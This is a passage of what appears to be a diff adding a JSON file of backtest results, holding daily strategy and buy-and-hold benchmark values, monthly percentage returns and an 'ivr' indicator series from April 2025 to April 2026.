], + [ + "2025-09-03", + 10153.25335576784 + ], + [ + "2025-09-04", + 10154.444370093974 + ], + [ + "2025-09-05", + 10155.635524130512 + ], + [ + "2025-09-08", + 10156.826817893842 + ], + [ + "2025-09-09", + 10158.018251400354 + ], + [ + "2025-09-10", + 10159.20982466644 + ], + [ + "2025-09-11", + 10160.401537708498 + ], + [ + "2025-09-12", + 10161.593390542921 + ], + [ + "2025-09-15", + 10162.785383186107 + ], + [ + "2025-09-16", + 10163.977515654457 + ], + [ + "2025-09-17", + 10165.169787964373 + ], + [ + "2025-09-18", + 10166.362200132258 + ], + [ + "2025-09-19", + 10167.55475217452 + ], + [ + "2025-09-22", + 10168.747444107565 + ], + [ + "2025-09-23", + 10169.940275947803 + ], + [ + "2025-09-24", + 10171.133247711647 + ], + [ + "2025-09-25", + 10172.326359415509 + ], + [ + "2025-09-26", + 10173.519611075804 + ], + [ + "2025-09-29", + 10174.713002708952 + ], + [ + "2025-09-30", + 10175.906534331369 + ], + [ + "2025-10-01", + 10177.100205959478 + ], + [ + "2025-10-02", + 10178.294017609702 + ], + [ + "2025-10-03", + 10179.487969298467 + ], + [ + "2025-10-06", + 10180.682061042198 + ], + [ + "2025-10-07", + 10181.876292857327 + ], + [ + "2025-10-08", + 10183.070664760282 + ], + [ + "2025-10-09", + 10184.265176767496 + ], + [ + "2025-10-10", + 10182.469828895404 + ], + [ + "2025-10-13", + 10228.240166750056 + ], + [ + "2025-10-14", + 10219.36324449755 + ], + [ + "2025-10-15", + 10235.122509912953 + ], + [ + "2025-10-16", + 10235.351785998953 + ], + [ + "2025-10-17", + 10248.229458323354 + ], + [ + "2025-10-20", + 10260.617194171848 + ], + [ + "2025-10-21", + 10261.820802674958 + ], + [ + "2025-10-22", + 10263.024552365816 + ], + [ + "2025-10-23", + 10264.228443260983 + ], + [ + "2025-10-24", + 10265.432475377023 + ], + [ + "2025-10-27", + 10266.636648730502 + ], + [ + "2025-10-28", + 10267.840963337987 + ], + [ + "2025-10-29", + 10269.045419216049 + ], + [ + "2025-10-30", + 10270.250016381257 + ], + [ + "2025-10-31", + 10271.454754850187 + ], + [ + "2025-11-03", + 10272.659634639413 + ], + [ + "2025-11-04", + 10273.864655765514 + ], + [ + "2025-11-05", + 10275.069818245067 + ], + [ + "2025-11-06", + 10273.285122094656 + ], + [ + "2025-11-07", + 10325.630723998629 + ], + [ + "2025-11-10", + 10405.37654784248 + ], + [ + "2025-11-11", + 10407.017299879857 + ], + [ + "2025-11-12", + 10412.066427537966 + ], + [ + "2025-11-13", + 10339.562365476979 + ], + [ + "2025-11-14", + 10351.078464913344 + ], + [ + "2025-11-17", + 10344.373086382493 + ], + [ + "2025-11-18", + 10283.834533977222 + ], + [ + "2025-11-19", + 10331.311527368998 + ], + [ + "2025-11-20", + 10149.720348869449 + ], + [ + "2025-11-21", + 10229.38447837577 + ], + [ + "2025-11-24", + 10420.250337012874 + ], + [ + "2025-11-25", + 10449.38699218413 + ], + [ + "2025-11-26", + 10450.612744085607 + ], + [ + "2025-11-28", + 10451.838639772333 + ], + [ + "2025-12-01", + 10453.064679261177 + ], + [ + "2025-12-02", + 10454.290862569005 + ], + [ + "2025-12-03", + 10455.51718971269 + ], + [ + "2025-12-04", + 10456.743660709102 + ], + [ + "2025-12-05", + 10457.970275575119 + ], + [ + "2025-12-08", + 10459.197034327613 + ], + [ + "2025-12-09", + 10460.423936983467 + ], + [ + "2025-12-10", + 10461.650983559557 + ], + [ + "2025-12-11", + 10462.878174072768 + ], + [ + "2025-12-12", + 10461.115508539984 + ], + [ + "2025-12-15", + 10458.658746025538 + ], + [ + "2025-12-16", + 10476.594534286094 + ], + [ + "2025-12-17", + 10385.761862785706 + ], + [ + "2025-12-18", + 10455.0366943836 + ], + [ + "2025-12-19", + 10524.092940898974 + ], + [ + "2025-12-22", + 10547.94251960011 + ], + [ + "2025-12-23", + 10563.634867315897 + ], + [ + "2025-12-24", + 10564.874020917425 + ], + [ + "2025-12-26", + 10566.11331987627 + ], + [ + "2025-12-29", + 10567.352764209489 + ], + [ + "2025-12-30", + 10568.59235393413 + ], + [ + "2025-12-31", + 10569.832089067248 + ], + [ + "2026-01-02", + 10568.081969625902 + ], + [ + "2026-01-05", + 10593.517540564366 + ], + [ + "2026-01-06", + 10608.329905254623 + ], + [ + "2026-01-07", + 10612.937077988932 + ], + [ + "2026-01-08", + 10608.605841530438 + ], + [ + "2026-01-09", + 10617.434889838096 + ], + [ + "2026-01-12", + 10618.68035438207 + ], + [ + "2026-01-13", + 10619.92596502366 + ], + [ + "2026-01-14", + 10621.171721780003 + ], + [ + "2026-01-15", + 10622.417624668242 + ], + [ + "2026-01-16", + 10623.663673705516 + ], + [ + "2026-01-20", + 10624.90986890897 + ], + [ + "2026-01-21", + 10626.156210295749 + ], + [ + "2026-01-22", + 10627.402697883 + ], + [ + "2026-01-23", + 10628.649331687877 + ], + [ + "2026-01-26", + 10629.896111727528 + ], + [ + "2026-01-27", + 10631.143038019109 + ], + [ + "2026-01-28", + 10632.390110579774 + ], + [ + "2026-01-29", + 10633.637329426681 + ], + [ + "2026-01-30", + 10634.884694576991 + ], + [ + "2026-02-02", + 10636.132206047867 + ], + [ + "2026-02-03", + 10634.389863856471 + ], + [ + "2026-02-04", + 10556.08279308744 + ], + [ + "2026-02-05", + 10464.144856299854 + ], + [ + "2026-02-06", + 10465.3723393536 + ], + [ + "2026-02-09", + 10466.599966395666 + ], + [ + "2026-02-10", + 10467.827737442944 + ], + [ + "2026-02-11", + 10469.055652512325 + ], + [ + "2026-02-12", + 10470.283711620705 + ], + [ + "2026-02-13", + 10471.511914784978 + ], + [ + "2026-02-17", + 10472.740262022044 + ], + [ + "2026-02-18", + 10473.968753348803 + ], + [ + "2026-02-19", + 10475.197388782157 + ], + [ + "2026-02-20", + 10476.42616833901 + ], + [ + "2026-02-23", + 10477.65509203627 + ], + [ + "2026-02-24", + 10475.894159890842 + ], + [ + "2026-02-25", + 10516.690374225265 + ], + [ + "2026-02-26", + 10485.78741830458 + ], + [ + "2026-02-27", + 10481.197190673398 + ], + [ + "2026-03-02", + 10508.306889287998 + ], + [ + "2026-03-03", + 10476.158861858788 + ], + [ + "2026-03-04", + 10530.784607221045 + ], + [ + "2026-03-05", + 10538.717098728095 + ], + [ + "2026-03-06", + 10493.41627463861 + ], + [ + "2026-03-09", + 10563.458234116055 + ], + [ + "2026-03-10", + 10571.625610365107 + ], + [ + "2026-03-11", + 10574.877088900368 + ], + [ + "2026-03-12", + 10576.117561256238 + ], + [ + "2026-03-13", + 10577.358179124123 + ], + [ + "2026-03-16", + 10578.598942521092 + ], + [ + "2026-03-17", + 10576.849851464214 + ], + [ + "2026-03-18", + 10521.163209140239 + ], + [ + "2026-03-19", + 10514.458753233155 + ], + [ + "2026-03-20", + 10395.713293386932 + ], + [ + "2026-03-23", + 10396.932749164205 + ], + [ + "2026-03-24", + 10398.152347988169 + ], + [ + "2026-03-25", + 10399.372089875604 + ], + [ + "2026-03-26", + 10400.591974843292 + ], + [ + "2026-03-27", + 10401.812002908018 + ], + [ + "2026-03-30", + 10403.032174086567 + ], + [ + "2026-03-31", + 10404.252488395727 + ], + [ + "2026-04-01", + 10405.472945852287 + ], + [ + "2026-04-02", + 10406.69354647304 + ], + [ + "2026-04-06", + 10407.914290274777 + ], + [ + "2026-04-07", + 10406.145177274297 + ], + [ + "2026-04-08", + 10464.877310314123 + ], + [ + "2026-04-09", + 10484.02100930056 + ], + [ + "2026-04-10", + 10499.260485159362 + ], + [ + "2026-04-13", + 10522.935541927034 + ], + [ + "2026-04-14", + 10524.169921346544 + ], + [ + "2026-04-15", + 10525.404445563343 + ], + [ + "2026-04-16", + 10526.639114594418 + ], + [ + "2026-04-17", + 10527.873928456755 + ], + [ + "2026-04-20", + 10529.108887167344 + ], + [ + "2026-04-21", + 10530.343990743177 + ], + [ + "2026-04-22", + 10531.579239201244 + ], + [ + "2026-04-23", + 10532.814632558544 + ] + ], + "benchmark_bh": [ + [ + "2025-04-24", + 10000.0 + ], + [ + "2025-04-25", + 10111.479686660843 + ], + [ + "2025-04-28", + 10108.270443831525 + ], + [ + "2025-04-29", + 10175.02938743881 + ], + [ + "2025-04-30", + 10173.745296615465 + ], + [ + "2025-05-01", + 10306.622122647406 + ], + [ + "2025-05-02", + 10459.611997227099 + ], + [ + "2025-05-05", + 10397.560949203611 + ], + [ + "2025-05-06", + 10300.845354324096 + ], + [ + "2025-05-07", + 10341.285357198045 + ], + [ + "2025-05-08", + 10448.058460580478 + ], + [ + "2025-05-09", + 10441.211507212267 + ], + [ + "2025-05-12", + 10866.588081445609 + ], + [ + "2025-05-13", + 11032.203646174908 + ], + [ + "2025-05-14", + 11098.320216294174 + ], + [ + "2025-05-15", + 11110.516782581508 + ], + [ + "2025-05-16", + 11158.873923868572 + ], + [ + "2025-05-19", + 11169.573149706815 + ], + [ + "2025-05-20", + 11132.34173350949 + ], + [ + "2025-05-21", + 10977.639956549569 + ], + [ + "2025-05-22", + 10998.1814728069 + ], + [ + "2025-05-23", + 10896.330170786705 + ], + [ + "2025-05-27", + 11152.66803168299 + ], + [ + "2025-05-28", + 11103.24004919833 + ], + [ + "2025-05-29", + 11125.066312431698 + ], + [ + "2025-05-30", + 11107.520789377937 + ], + [ + "2025-06-02", + 11195.25102925752 + ], + [ + "2025-06-03", + 11282.763426442494 + ], + [ + "2025-06-04", + 11314.21807431651 + ], + [ + "2025-06-05", + 11229.056016083616 + ], + [ + "2025-06-06", + 11338.823800364231 + ], + [ + "2025-06-09", + 11355.516324915003 + ], + [ + "2025-06-10", + 11430.61956233959 + ], + [ + "2025-06-11", + 11392.103399166226 + ], + [ + "2025-06-12", + 11418.85080760914 + ], + [ + "2025-06-13", + 11275.489317670093 + ], + [ + "2025-06-16", + 11432.330808567123 + ], + [ + "2025-06-17", + 11320.851778058975 + ], + [ + "2025-06-18", + 11318.925313747613 + ], + [ + "2025-06-20", + 11272.708542550354 + ], + [ + "2025-06-23", + 11388.61922835787 + ], + [ + "2025-06-24", + 11562.775276560158 + ], + [ + "2025-06-25", + 11592.333643146763 + ], + [ + "2025-06-26", + 11700.726131379486 + ], + [ + "2025-06-27", + 11740.784253385174 + ], + [ + "2025-06-30", + 11816.829726079215 + ], + [ + "2025-07-01", + 11717.220497816488 + ], + [ + "2025-07-02", + 11798.835394582344 + ], + [ + "2025-07-03", + 11914.938989282075 + ], + [ + "2025-07-07", + 11825.185174492326 + ], + [ + "2025-07-08", + 11831.825439761738 + ], + [ + "2025-07-09", + 11915.582018922787 + ], + [ + "2025-07-10", + 11898.445935150461 + ], + [ + "2025-07-11", + 11871.668343683596 + ], + [ + "2025-07-14", + 11914.72639580902 + ], + [ + "2025-07-15", + 11925.64871356343 + ], + [ + "2025-07-16", + 11937.859715210046 + ], + [ + "2025-07-17", + 12034.469013353035 + ], + [ + "2025-07-18", + 12022.902353652524 + ], + [ + "2025-07-21", + 12085.23817194547 + ], + [ + "2025-07-22", + 12022.688447874081 + ], + [ + "2025-07-23", + 12077.527065478462 + ], + [ + "2025-07-24", + 12103.231191136952 + ], + [ + "2025-07-25", + 12132.364370777452 + ], + [ + "2025-07-28", + 12170.282122693336 + ], + [ + "2025-07-29", + 12151.43085577731 + ], + [ + "2025-07-30", + 12167.710004130482 + ], + [ + "2025-07-31", + 12103.231191136952 + ], + [ + "2025-08-01", + 11864.814172635743 + ], + [ + "2025-08-04", + 12083.7382068856 + ], + [ + "2025-08-05", + 12001.695498562862 + ], + [ + "2025-08-06", + 12152.715602753347 + ], + [ + "2025-08-07", + 12193.843253651245 + ], + [ + "2025-08-08", + 12307.591260177338 + ], + [ + "2025-08-11", + 12271.173473321323 + ], + [ + "2025-08-12", + 12425.40741340999 + ], + [ + "2025-08-13", + 12431.621179427908 + ], + [ + "2025-08-14", + 12421.980984038757 + ], + [ + "2025-08-15", + 12367.357584518208 + ], + [ + "2025-08-18", + 12362.429877781718 + ], + [ + "2025-08-19", + 12194.701501375788 + ], + [ + "2025-08-20", + 12122.29767613681 + ], + [ + "2025-08-21", + 12066.174311556391 + ], + [ + "2025-08-22", + 12252.323518710686 + ], + [ + "2025-08-25", + 12216.980509968436 + ], + [ + "2025-08-26", + 12266.031860806392 + ], + [ + "2025-08-27", + 12284.884440027809 + ], + [ + "2025-08-28", + 12361.786848141004 + ], + [ + "2025-08-29", + 12218.693068501358 + ], + [ + "2025-09-02", + 12116.300440508112 + ], + [ + "2025-09-03", + 12211.623679369673 + ], + [ + "2025-09-04", + 12322.156537692199 + ], + [ + "2025-09-05", + 12339.93696341063 + ], + [ + "2025-09-08", + 12400.131099308383 + ], + [ + "2025-09-09", + 12435.26151457758 + ], + [ + "2025-09-10", + 12439.332285894916 + ], + [ + "2025-09-11", + 12511.736111133894 + ], + [ + "2025-09-12", + 12567.002540295158 + ], + [ + "2025-09-15", + 12674.536780803335 + ], + [ + "2025-09-16", + 12663.825744216589 + ], + [ + "2025-09-17", + 12638.549430114981 + ], + [ + "2025-09-18", + 12752.511342419517 + ], + [ + "2025-09-19", + 12838.837415532644 + ], + [ + "2025-09-22", + 12914.843519065009 + ], + [ + "2025-09-23", + 12829.059428077628 + ], + [ + "2025-09-24", + 12784.02241942527 + ], + [ + "2025-09-25", + 12728.906905383767 + ], + [ + "2025-09-26", + 12781.233770473194 + ], + [ + "2025-09-29", + 12840.42530505359 + ], + [ + "2025-09-30", + 12875.597714095242 + ], + [ + "2025-10-01", + 12937.361367238493 + ], + [ + "2025-10-02", + 12990.547792357855 + ], + [ + "2025-10-03", + 12935.861402178623 + ], + [ + "2025-10-06", + 13033.011370141969 + ], + [ + "2025-10-07", + 12964.38435981314 + ], + [ + "2025-10-08", + 13113.005569752147 + ], + [ + "2025-10-09", + 13097.135860680411 + ], + [ + "2025-10-10", + 12642.47847245028 + ], + [ + "2025-10-13", + 12910.768810831507 + ], + [ + "2025-10-14", + 12824.770814065683 + ], + [ + "2025-10-15", + 12915.27264292728 + ], + [ + "2025-10-16", + 12867.448297628238 + ], + [ + "2025-10-17", + 12951.945017028804 + ], + [ + "2025-10-20", + 13115.14987675812 + ], + [ + "2025-10-21", + 13111.71951047072 + ], + [ + "2025-10-22", + 12985.400930621367 + ], + [ + "2025-10-23", + 13094.562429812166 + ], + [ + "2025-10-24", + 13234.389881338066 + ], + [ + "2025-10-27", + 13470.083866156661 + ], + [ + "2025-10-28", + 13573.66806744331 + ], + [ + "2025-10-29", + 13634.790003251237 + ], + [ + "2025-10-30", + 13426.332916785732 + ], + [ + "2025-10-31", + 13491.101749270276 + ], + [ + "2025-11-03", + 13555.652739060211 + ], + [ + "2025-11-04", + 13280.49904349341 + ], + [ + "2025-11-05", + 13366.928788732284 + ], + [ + "2025-11-06", + 13117.938525710195 + ], + [ + "2025-11-07", + 13076.547101429067 + ], + [ + "2025-11-10", + 13365.855322923908 + ], + [ + "2025-11-11", + 13330.255102325373 + ], + [ + "2025-11-12", + 13319.746160768565 + ], + [ + "2025-11-13", + 13047.810238016109 + ], + [ + "2025-11-14", + 13057.674837626813 + ], + [ + "2025-11-17", + 12946.155125651601 + ], + [ + "2025-11-18", + 12788.524939215655 + ], + [ + "2025-11-19", + 12864.873554454603 + ], + [ + "2025-11-20", + 12560.338653528739 + ], + [ + "2025-11-21", + 12654.702597150788 + ], + [ + "2025-11-24", + 12978.323667657349 + ], + [ + "2025-11-25", + 13058.319179572916 + ], + [ + "2025-11-26", + 13173.6983816978 + ], + [ + "2025-11-28", + 13280.49904349341 + ], + [ + "2025-12-01", + 13235.891158703324 + ], + [ + "2025-12-02", + 13339.475359989974 + ], + [ + "2025-12-03", + 13372.074338163382 + ], + [ + "2025-12-04", + 13359.636307684434 + ], + [ + "2025-12-05", + 13414.108792085224 + ], + [ + "2025-12-08", + 13388.373171097392 + ], + [ + "2025-12-09", + 13404.885909809844 + ], + [ + "2025-12-10", + 13459.788830378295 + ], + [ + "2025-12-11", + 13416.254411396585 + ], + [ + "2025-12-12", + 13159.757761548206 + ], + [ + "2025-12-15", + 13093.704182087622 + ], + [ + "2025-12-16", + 13119.653708853895 + ], + [ + "2025-12-17", + 12876.454649514399 + ], + [ + "2025-12-18", + 13063.035605141744 + ], + [ + "2025-12-19", + 13233.31904014047 + ], + [ + "2025-12-22", + 13296.751945738797 + ], + [ + "2025-12-23", + 13359.024773373061 + ], + [ + "2025-12-24", + 13398.107852474564 + ], + [ + "2025-12-26", + 13397.248292444632 + ], + [ + "2025-12-29", + 13332.398097025954 + ], + [ + "2025-12-30", + 13301.47493283457 + ], + [ + "2025-12-31", + 13191.52998732641 + ], + [ + "2026-01-02", + 13165.97677678768 + ], + [ + "2026-01-05", + 13270.553080948574 + ], + [ + "2026-01-06", + 13387.155351696203 + ], + [ + "2026-01-07", + 13400.040878312873 + ], + [ + "2026-01-08", + 13323.807745948176 + ], + [ + "2026-01-09", + 13456.515940737601 + ], + [ + "2026-01-12", + 13467.682347294403 + ], + [ + "2026-01-13", + 13447.71168388138 + ], + [ + "2026-01-14", + 13304.052300618981 + ], + [ + "2026-01-15", + 13351.939636576708 + ], + [ + "2026-01-16", + 13340.773230019904 + ], + [ + "2026-01-20", + 13057.319202866338 + ], + [ + "2026-01-21", + 13233.83346385304 + ], + [ + "2026-01-22", + 13330.035947325374 + ], + [ + "2026-01-23", + 13372.124205768172 + ], + [ + "2026-01-26", + 13430.96273019887 + ], + [ + "2026-01-27", + 13552.718424209936 + ], + [ + "2026-01-28", + 13597.597956215586 + ], + [ + "2026-01-29", + 13516.212712892842 + ], + [ + "2026-01-30", + 13353.871350109626 + ], + [ + "2026-02-02", + 13445.564752264629 + ], + [ + "2026-02-03", + 13238.986887116474 + ], + [ + "2026-02-04", + 13007.715371459522 + ], + [ + "2026-02-05", + 12820.46514008368 + ], + [ + "2026-02-06", + 13091.462764482849 + ], + [ + "2026-02-09", + 13191.745205410241 + ], + [ + "2026-02-10", + 13130.544531278963 + ], + [ + "2026-02-11", + 13165.761558703849 + ], + [ + "2026-02-12", + 12897.984331729805 + ], + [ + "2026-02-13", + 12925.470568106844 + ], + [ + "2026-02-17", + 12912.155917627902 + ], + [ + "2026-02-18", + 13008.573619184068 + ], + [ + "2026-02-19", + 12958.754569693423 + ], + [ + "2026-02-20", + 13073.425126908132 + ], + [ + "2026-02-23", + 12914.518067328485 + ], + [ + "2026-02-24", + 13053.239245411278 + ], + [ + "2026-02-25", + 13242.422502625432 + ], + [ + "2026-02-26", + 13082.658507626627 + ], + [ + "2026-02-27", + 13040.78415496227 + ], + [ + "2026-03-02", + 13057.96354481244 + ], + [ + "2026-03-03", + 12918.17021322666 + ], + [ + "2026-03-04", + 13115.084261488659 + ], + [ + "2026-03-05", + 13075.570746219495 + ], + [ + "2026-03-06", + 12878.871916041326 + ], + [ + "2026-03-09", + 13050.877095710697 + ], + [ + "2026-03-10", + 13051.092313794528 + ], + [ + "2026-03-11", + 13049.374506040049 + ], + [ + "2026-03-12", + 12825.403345263283 + ], + [ + "2026-03-13", + 12749.385430982415 + ], + [ + "2026-03-16", + 12892.40047229871 + ], + [ + "2026-03-17", + 12955.318954184466 + ], + [ + "2026-03-18", + 12774.726048048093 + ], + [ + "2026-03-19", + 12734.354285054384 + ], + [ + "2026-03-20", + 12499.001499636983 + ], + [ + "2026-03-23", + 12642.477160144892 + ], + [ + "2026-03-24", + 12556.04347798985 + ], + [ + "2026-03-25", + 12638.607171552107 + ], + [ + "2026-03-26", + 12336.950156344783 + ], + [ + "2026-03-27", + 12095.926899340599 + ], + [ + "2026-03-30", + 12003.473672365244 + ], + [ + "2026-03-31", + 12409.838222272381 + ], + [ + "2026-04-01", + 12563.139113229317 + ], + [ + "2026-04-02", + 12577.544289486696 + ], + [ + "2026-04-06", + 12653.227565893314 + ], + [ + "2026-04-07", + 12655.163216342402 + ], + [ + "2026-04-08", + 13031.42741753719 + ], + [ + "2026-04-09", + 13119.580219752099 + ], + [ + "2026-04-10", + 13138.501038853754 + ], + [ + "2026-04-13", + 13274.38632499046 + ], + [ + "2026-04-14", + 13515.409581994645 + ], + [ + "2026-04-15", + 13704.617773011192 + ], + [ + "2026-04-16", + 13770.624109477765 + ], + [ + "2026-04-17", + 13950.801014805758 + ], + [ + "2026-04-20", + 13906.509395614472 + ], + [ + "2026-04-21", + 13853.618239207683 + ], + [ + "2026-04-22", + 14085.39630474487 + ], + [ + "2026-04-23", + 14006.058257829296 + ] + ], + "monthly_pct": [ + [ + "2025-05-31", + 0.24662697723032423 + ], + [ + "2025-06-30", + 0.2348690548344079 + ], + [ + "2025-07-31", + 0.2583862788740676 + ], + [ + "2025-08-31", + 0.6068077792121818 + ], + [ + "2025-09-30", + 0.34176295916588106 + ], + [ + "2025-10-31", + 0.9389651938769061 + ], + [ + "2025-11-30", + 1.756166864649522 + ], + [ + "2025-12-31", + 1.1289252863693644 + ], + [ + "2026-01-31", + 0.6154554297700621 + ], + [ + "2026-02-28", + -1.4451261891157308 + ], + [ + "2026-03-31", + -0.7341213115057088 + ], + [ + "2026-04-30", + 1.2356692064731112 + ] + ], + "ivr": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 50.0 + ], + [ + "2025-04-29", + 50.0 + ], + [ + "2025-04-30", + 50.0 + ], + [ + "2025-05-01", + 50.0 + ], + [ + "2025-05-02", + 50.0 + ], + [ + "2025-05-05", + 50.0 + ], + [ + "2025-05-06", + 50.0 + ], + [ + "2025-05-07", + 50.0 + ], + [ + "2025-05-08", + 50.0 + ], + [ + "2025-05-09", + 50.0 + ], + [ + "2025-05-12", + 50.0 + ], + [ + "2025-05-13", + 50.0 + ], + [ + "2025-05-14", + 50.0 + ], + [ + "2025-05-15", + 50.0 + ], + [ + "2025-05-16", + 50.0 + ], + [ + "2025-05-19", + 50.0 + ], + [ + "2025-05-20", + 50.0 + ], + [ + "2025-05-21", + 50.0 + ], + [ + "2025-05-22", + 50.0 + ], + [ + "2025-05-23", + 100.0 + ], + [ + "2025-05-27", + 100.0 + ], + [ + "2025-05-28", + 100.0 + ], + [ + "2025-05-29", + 98.13558709702309 + ], + [ + "2025-05-30", + 94.47719831990835 + ], + [ + "2025-06-02", + 72.10860091258307 + ], + [ + "2025-06-03", + 59.36015732930498 + ], + [ + "2025-06-04", + 25.530880185866494 + ], + [ + "2025-06-05", + 51.95940410079971 + ], + [ + "2025-06-06", + 51.11637491807009 + ], + [ + "2025-06-09", + 48.08637599474673 + ], + [ + "2025-06-10", + 0.0 + ], + [ + "2025-06-11", + 0.0 + ], + [ + "2025-06-12", + 0.0 + ], + [ + "2025-06-13", + 12.569507013498413 + ], + [ + "2025-06-16", + 22.304268225557557 + ], + [ + "2025-06-17", + 29.316763202295267 + ], + [ + "2025-06-18", + 28.357551999966056 + ], + [ + "2025-06-20", + 16.536112107779697 + ], + [ + "2025-06-23", + 21.63816642583292 + ], + [ + "2025-06-24", + 23.33644572629659 + ], + [ + "2025-06-25", + 0.0 + ], + [ + "2025-06-26", + 0.5122613659941597 + ], + [ + "2025-06-27", + 0.4926229317243988 + ], + [ + "2025-06-30", + 0.0177318729363591 + ], + [ + "2025-07-01", + 6.5500161012859115 + ], + [ + "2025-07-02", + 5.781803142383359 + ], + [ + "2025-07-03", + 9.058619001081244 + ], + [ + "2025-07-07", + 8.619722618639408 + ], + [ + "2025-07-08", + 5.320576609043694 + ], + [ + "2025-07-09", + 6.800809806604752 + ], + [ + "2025-07-10", + 6.409723309491564 + ], + [ + "2025-07-11", + 5.828220693732528 + ], + [ + "2025-07-14", + 5.992013714348394 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.341264016813814 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.8131654715451522 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 1.5541873586090396 + ], + [ + "2025-08-01", + 21.815208849741687 + ], + [ + "2025-08-04", + 34.32349598524584 + ], + [ + "2025-08-05", + 36.92065610856499 + ], + [ + "2025-08-06", + 41.10071462027917 + ], + [ + "2025-08-07", + 41.07128806718728 + ], + [ + "2025-08-08", + 42.78568586472984 + ], + [ + "2025-08-11", + 43.42395418508361 + ], + [ + "2025-08-12", + 47.84239760924263 + ], + [ + "2025-08-13", + 47.88426181302264 + ], + [ + "2025-08-14", + 46.73314239281879 + ], + [ + "2025-08-15", + 47.926330756127925 + ], + [ + "2025-08-18", + 47.438914483696685 + ], + [ + "2025-08-19", + 53.85170222859267 + ], + [ + "2025-08-20", + 54.75497791088535 + ], + [ + "2025-08-21", + 55.3097556244548 + ], + [ + "2025-08-22", + 62.8695218338162 + ], + [ + "2025-08-25", + 62.89925760798894 + ], + [ + "2025-08-26", + 63.23913703892177 + ], + [ + "2025-08-27", + 63.26162548565232 + ], + [ + "2025-08-28", + 62.96917752970561 + ], + [ + "2025-08-29", + 53.45409833465554 + ], + [ + "2025-09-02", + 44.980741340861854 + ], + [ + "2025-09-03", + 45.01593827244624 + ], + [ + "2025-09-04", + 42.24179764373217 + ], + [ + "2025-09-05", + 41.92387026724521 + ], + [ + "2025-09-08", + 39.64857808865119 + ], + [ + "2025-09-09", + 39.41094583303245 + ], + [ + "2025-09-10", + 33.102464421835215 + ], + [ + "2025-09-11", + 34.46196194586282 + ], + [ + "2025-09-12", + 35.04086226306272 + ], + [ + "2025-09-15", + 36.326596344095854 + ], + [ + "2025-09-16", + 36.39988837000924 + ], + [ + "2025-09-17", + 26.677346573082367 + ], + [ + "2025-09-18", + 25.80991978141851 + ], + [ + "2025-09-19", + 23.889576502496194 + ], + [ + "2025-09-22", + 16.362303281933592 + ], + [ + "2025-09-23", + 19.377751565442413 + ], + [ + "2025-09-24", + 20.952602119625706 + ], + [ + "2025-09-25", + 22.983076533394392 + ], + [ + "2025-09-26", + 22.247775964032755 + ], + [ + "2025-09-29", + 11.761511797247087 + ], + [ + "2025-09-30", + 3.7909954693442356 + ], + [ + "2025-10-01", + 2.343158918601649 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 3.2993834867618683 + ], + [ + "2025-10-06", + 4.703852336453262 + ], + [ + "2025-10-07", + 8.43478400092706 + ], + [ + "2025-10-08", + 13.229902694243794 + ], + [ + "2025-10-09", + 13.39292259490496 + ], + [ + "2025-10-10", + 67.23149222089233 + ], + [ + "2025-10-13", + 78.29157342851629 + ], + [ + "2025-10-14", + 79.84514610534798 + ], + [ + "2025-10-15", + 80.65716215238606 + ], + [ + "2025-10-16", + 79.22432975238091 + ], + [ + "2025-10-17", + 79.13008703229578 + ], + [ + "2025-10-20", + 82.50047999068511 + ], + [ + "2025-10-21", + 80.90838778311876 + ], + [ + "2025-10-22", + 83.57791564024627 + ], + [ + "2025-10-23", + 84.23779742316897 + ], + [ + "2025-10-24", + 86.25633293047935 + ], + [ + "2025-10-27", + 92.74000546944427 + ], + [ + "2025-10-28", + 93.44045105788211 + ], + [ + "2025-10-29", + 93.395023162358 + ], + [ + "2025-10-30", + 100.0 + ], + [ + "2025-10-31", + 99.21398009347268 + ], + [ + "2025-11-03", + 98.63652246735433 + ], + [ + "2025-11-04", + 100.0 + ], + [ + "2025-11-05", + 98.3747716251463 + ], + [ + "2025-11-06", + 100.0 + ], + [ + "2025-11-07", + 73.03466344015487 + ], + [ + "2025-11-10", + 73.67990647473897 + ], + [ + "2025-11-11", + 72.42923210122146 + ], + [ + "2025-11-12", + 71.92524803766435 + ], + [ + "2025-11-13", + 82.18137459575009 + ], + [ + "2025-11-14", + 81.42459867502811 + ], + [ + "2025-11-17", + 79.38443081024549 + ], + [ + "2025-11-18", + 82.09644948582937 + ], + [ + "2025-11-19", + 81.3237819458552 + ], + [ + "2025-11-20", + 90.16708665248736 + ], + [ + "2025-11-21", + 88.78153620916873 + ], + [ + "2025-11-24", + 96.07413111965718 + ], + [ + "2025-11-25", + 95.53277680961365 + ], + [ + "2025-11-26", + 97.01321252529088 + ], + [ + "2025-11-28", + 94.51668269866119 + ], + [ + "2025-12-01", + 93.99177760163646 + ], + [ + "2025-12-02", + 94.88583692714688 + ], + [ + "2025-12-03", + 86.68114383297083 + ], + [ + "2025-12-04", + 85.83581894595555 + ], + [ + "2025-12-05", + 77.97573305691739 + ], + [ + "2025-12-08", + 77.73359919510793 + ], + [ + "2025-12-09", + 66.925275342348 + ], + [ + "2025-12-10", + 67.02433735564969 + ], + [ + "2025-12-11", + 67.30668918849054 + ], + [ + "2025-12-12", + 66.2380862102485 + ], + [ + "2025-12-15", + 66.92843086997095 + ], + [ + "2025-12-16", + 65.00205246295565 + ], + [ + "2025-12-17", + 70.2068200256125 + ], + [ + "2025-12-18", + 74.09111802684598 + ], + [ + "2025-12-19", + 61.22146223177235 + ], + [ + "2025-12-22", + 60.689737178709876 + ], + [ + "2025-12-23", + 45.16290547276249 + ], + [ + "2025-12-24", + 44.498003464102645 + ], + [ + "2025-12-26", + 42.62844085650992 + ], + [ + "2025-12-29", + 42.02360486043418 + ], + [ + "2025-12-30", + 41.91240311111996 + ], + [ + "2025-12-31", + 42.05285563169243 + ], + [ + "2026-01-02", + 41.81214524551431 + ], + [ + "2026-01-05", + 44.19546174685421 + ], + [ + "2026-01-06", + 46.236192949875026 + ], + [ + "2026-01-07", + 46.15611332256565 + ], + [ + "2026-01-08", + 47.08321766756964 + ], + [ + "2026-01-09", + 49.55337510808413 + ], + [ + "2026-01-12", + 